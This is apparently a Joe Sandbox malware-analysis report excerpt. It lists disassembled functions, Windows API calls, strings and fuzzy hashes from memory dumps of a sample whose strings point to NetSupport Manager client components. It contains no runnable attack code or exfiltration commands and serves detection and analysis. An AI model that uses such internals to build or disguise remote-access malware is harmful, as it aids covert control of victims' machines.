select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6D1C76F3
GetTickCount.KERNEL32 ref: 6D1C7717
ioctlsocket.WSOCK32 ref: 6D1C775C
SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6D1C7762
WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6D1C777A
__WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6D1C778B

Strings

ConnectTimeout, xrefs: 6D1C767E
General, xrefs: 6D1C7683
*BlockingIO, xrefs: 6D1C7732

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
String ID: *BlockingIO$ConnectTimeout$General
API String ID: 4218156244-2969206566
Opcode ID: f793bb46f19506cf851d4bc2c536d44d5ef7856f8b12f4d7d8a2886d7ed1810f
Instruction ID: f9b40d93435d0a91459684ecbf79973e47697322a1a4670aaa7ff85db846257b
Opcode Fuzzy Hash: f793bb46f19506cf851d4bc2c536d44d5ef7856f8b12f4d7d8a2886d7ed1810f
Instruction Fuzzy Hash: 4D41EB71E043189BE720DB64CC4CBFEB3BAAF55308F01419AE60D97145EBF45A84DBA2

Function 111450A0 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetVersionExA.KERNEL32(111F0EF0,76938400), ref: 111450D0
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
_memset.LIBCMT ref: 1114512D

Part of subcall function 11143000: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,76938400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020

_strncpy.LIBCMT ref: 111451FA

Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52

RegCloseKey.KERNEL32(00000000), ref: 11145296

Strings

CurrentMinorVersionNumber, xrefs: 11145260
CurrentVersion, xrefs: 11145174
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 111450FB
Service Pack, xrefs: 111452DD
CurrentMajorVersionNumber, xrefs: 11145228
CSDVersion, xrefs: 1114514A

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
API String ID: 3299820421-2117887902
Opcode ID: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
Instruction ID: 1fcbe558ef897eaa1b38a7330f4b62b9d1ba330f7a3c6d488077e096d0eda0f8
Opcode Fuzzy Hash: a6d85e33813e4188b4b6cdba8074358a089f7fb1fdaa889e4758e92ad03e0a5c
Instruction Fuzzy Hash: 6D51D9B1E0022BEFEB51CF60CD41F9EF7B9AB04B08F104199F519A7941E7716A48CB91

Function 6D1C8D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,6D1D67B5), ref: 6D1C8D6B

Part of subcall function 6D1C4F70: LoadLibraryA.KERNEL32(psapi.dll,?,6D1C8DC8), ref: 6D1C4F78

GetCurrentProcessId.KERNEL32 ref: 6D1C8DCB
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6D1C8DD8
FreeLibrary.KERNEL32(?), ref: 6D1C8EBF

Part of subcall function 6D1C4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6D1C4FC4
Part of subcall function 6D1C4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6D1C8E0D,00000000,?,6D1C8E0D,00000000,?,00000FA0,?), ref: 6D1C4FE4

CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6D1C8EAE

Part of subcall function 6D1C5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6D1C5014
Part of subcall function 6D1C5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6D1C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6D1C5034

Part of subcall function 6D1C2420: _strrchr.LIBCMT ref: 6D1C242E

Strings

NSM247Ctl.dll, xrefs: 6D1C8E7E
CLIENT247, xrefs: 6D1C8DA7
Set Is247=%d, xrefs: 6D1C8ED7
pcictl_247.dll, xrefs: 6D1C8E6C
is247, xrefs: 6D1C8D42
NSM247, xrefs: 6D1C8D8B

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
API String ID: 2714439535-3484705551
Opcode ID: 39f780be10f06678604523ed8e498e2323aded7378436e4387863c90f1ff3562
Instruction ID: 9639c7966b58bd5f1189f8bd0b2b71d3130b39b666341a11f0d7d719647bc2a1
Opcode Fuzzy Hash: 39f780be10f06678604523ed8e498e2323aded7378436e4387863c90f1ff3562
Instruction Fuzzy Hash: 164119719442199BEB14DB51DC85FFBB7B8EB65708F004059EB04E3149EBF89A84CF62

Function 1115E380 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115E3A8
GetLastError.KERNEL32 ref: 1115E3B5
wsprintfA.USER32 ref: 1115E3C8

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584

GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115E40C
GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115E419

Strings

..\ctl32\wndclass.cpp, xrefs: 1115E3D9, 1115E3F5
NSMReflect, xrefs: 1115E407
GlobalAddAtom failed, e=%d, xrefs: 1115E3C2
NSMWndClass, xrefs: 1115E3A0
NSMDropTarget, xrefs: 1115E40E
m_aProp, xrefs: 1115E3FA

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
API String ID: 1734919802-1728070458
Opcode ID: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
Instruction ID: 2151ae3f148807adf1b9b51829e7bc1db46dc9b6ec15270657221fcdabbc1952
Opcode Fuzzy Hash: c283eabc343593951191b6a2689ac3898b07c71967e340f2684f7c9ae3ac2948
Instruction Fuzzy Hash: 1B110479A01319ABC720EFE69C84A96F7B4FF2231CB40822EE46543240DA706944CB51

Function 111100D0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477

std::exception::exception.LIBCMT ref: 1111013A
__CxxThrowException@8.LIBCMT ref: 1111014F
GetCurrentThreadId.KERNEL32 ref: 11110166
InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
LeaveCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111024F

Strings

QueueThreadEvent, xrefs: 111101DB
..\ctl32\Refcount.cpp, xrefs: 111101D6

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
API String ID: 1976012330-1024648535
Opcode ID: 8c7ff18307fdfc7dc9cfa15ec2f4ee6c8e6ccf2b204cd545ae2c61337709aa2b
Instruction ID: 7e481d80fa827a07ee7257280804c30d2ae959ce5d98406b053f8524d928f6e4
Opcode Fuzzy Hash: 8c7ff18307fdfc7dc9cfa15ec2f4ee6c8e6ccf2b204cd545ae2c61337709aa2b
Instruction Fuzzy Hash: 6C41C2B5E00216AFDB11CFB98C84BAEFBF5FB48708F00453AE815DB244E675A944CB91

Function 110607F0 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,1117F505,00000000,00000000,461C6054,00000000,?,00000000), ref: 11060874
_malloc.LIBCMT ref: 110608BB

Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509

RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,461C6054,00000000), ref: 110608FB
RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11060962
_free.LIBCMT ref: 11060974

Strings

err == 0, xrefs: 11060888
strlen (k.m_k) < _tsizeof (m_szSectionAndKey), xrefs: 11060A7A
..\ctl32\Config.cpp, xrefs: 11060883, 110608A3, 11060A75
maxname < _tsizeof (m_szSectionAndKey), xrefs: 110608A8

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
API String ID: 999355418-161875503
Opcode ID: b352b509771dcc32ad87cfb6a45288db3d7f81144d707e567bf323ae8f0cc4e3
Instruction ID: c47c75eefe38bee888b154a00c4449ad07b8701d7df13cace45a3bfee881b040
Opcode Fuzzy Hash: b352b509771dcc32ad87cfb6a45288db3d7f81144d707e567bf323ae8f0cc4e3
Instruction Fuzzy Hash: E3A1B075A007469FE721CF64C880BABFBF8AF45308F044A5CE99697684E770F508CBA1

Function 1115BA20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,461C6054,00000000,?), ref: 1115BA67
CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
wsprintfW.USER32 ref: 1115BAA7
SysAllocString.OLEAUT32(?), ref: 1115BAB3
wsprintfW.USER32 ref: 1115BB67
SysFreeString.OLEAUT32(?), ref: 1115BC08

Strings

WQL, xrefs: 1115BB80
root\CIMV2, xrefs: 1115BAA1
SELECT * FROM %s, xrefs: 1115BB61

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
String ID: SELECT * FROM %s$WQL$root\CIMV2
API String ID: 3050498177-823534439
Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55

Function 6D1E0D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(IPHLPAPI.DLL,00000000,6D1E0F2B,7AB33BE4,00000000,?,?,6D1FF278,000000FF,?,6D1CAE0A,?,00000000,?,00000080), ref: 6D1E0D48
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 6D1E0D5B
GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-6D20CB4C,?,?,6D1FF278,000000FF,?,6D1CAE0A,?,00000000,?,00000080), ref: 6D1E0D76
_malloc.LIBCMT ref: 6D1E0D8C

Part of subcall function 6D1E1B69: __FF_MSGBANNER.LIBCMT ref: 6D1E1B82
Part of subcall function 6D1E1B69: __NMSG_WRITE.LIBCMT ref: 6D1E1B89
Part of subcall function 6D1E1B69: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6D1ED3C1,6D1E6E81,00000001,6D1E6E81,?,6D1EF447,00000018,6D207738,0000000C,6D1EF4D7), ref: 6D1E1BAE

GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,6D1FF278,000000FF,?,6D1CAE0A,?,00000000,?), ref: 6D1E0D9F
_free.LIBCMT ref: 6D1E0D84

Part of subcall function 6D1E1BFD: HeapFree.KERNEL32(00000000,00000000), ref: 6D1E1C13
Part of subcall function 6D1E1BFD: GetLastError.KERNEL32(00000000), ref: 6D1E1C25

_free.LIBCMT ref: 6D1E0DAF

Strings

IPHLPAPI.DLL, xrefs: 6D1E0D41
GetAdaptersAddresses, xrefs: 6D1E0D55

Memory Dump Source

Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true

Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd

Yara matches

Similarity

API ID: AdaptersAddressesHeap_free$AddressAllocErrorFreeLastLibraryLoadProc_malloc
String ID: GetAdaptersAddresses$IPHLPAPI.DLL
API String ID: 3205077458-1843585929
Opcode ID: 3f2985d5282f4aa00c239b2c6d6a99c4e926f3ab8549bd16088607b5740a6a43
Instruction ID: b7674c1aff251a694a198282ac1b75d7be64c2bef42753cd3cc524aa2117c84f
Opcode Fuzzy Hash: 3f2985d5282f4aa00c239b2c6d6a99c4e926f3ab8549bd16088607b5740a6a43
Instruction Fuzzy Hash: F701D4B5200B026BE7208B718C88F6776ACAB55B44F10881CF65A9B288EAB1F480C764

Function 11145440 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404

_memset.LIBCMT ref: 11145485
GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
FreeLibrary.KERNEL32(00000000), ref: 111454EF
GetSystemDefaultLangID.KERNEL32 ref: 111454FA

Strings

GetUserDefaultUILanguage, xrefs: 111454D1
kernel32.dll, xrefs: 111454B0

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
String ID: GetUserDefaultUILanguage$kernel32.dll
API String ID: 4251163631-545709139
Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91

Function 11015010 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 110150CA
_memset.LIBCMT ref: 1101510E
RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148

Strings

%012d, xrefs: 110150C4
PackedCatalogItem, xrefs: 11015132
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
NSLSP, xrefs: 11015158

Memory Dump Source

Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_shv.jbxd

Yara matches

Similarity

API ID: QueryValue_memsetwsprintf
String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
API String ID: 1333399081-1346142259
Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
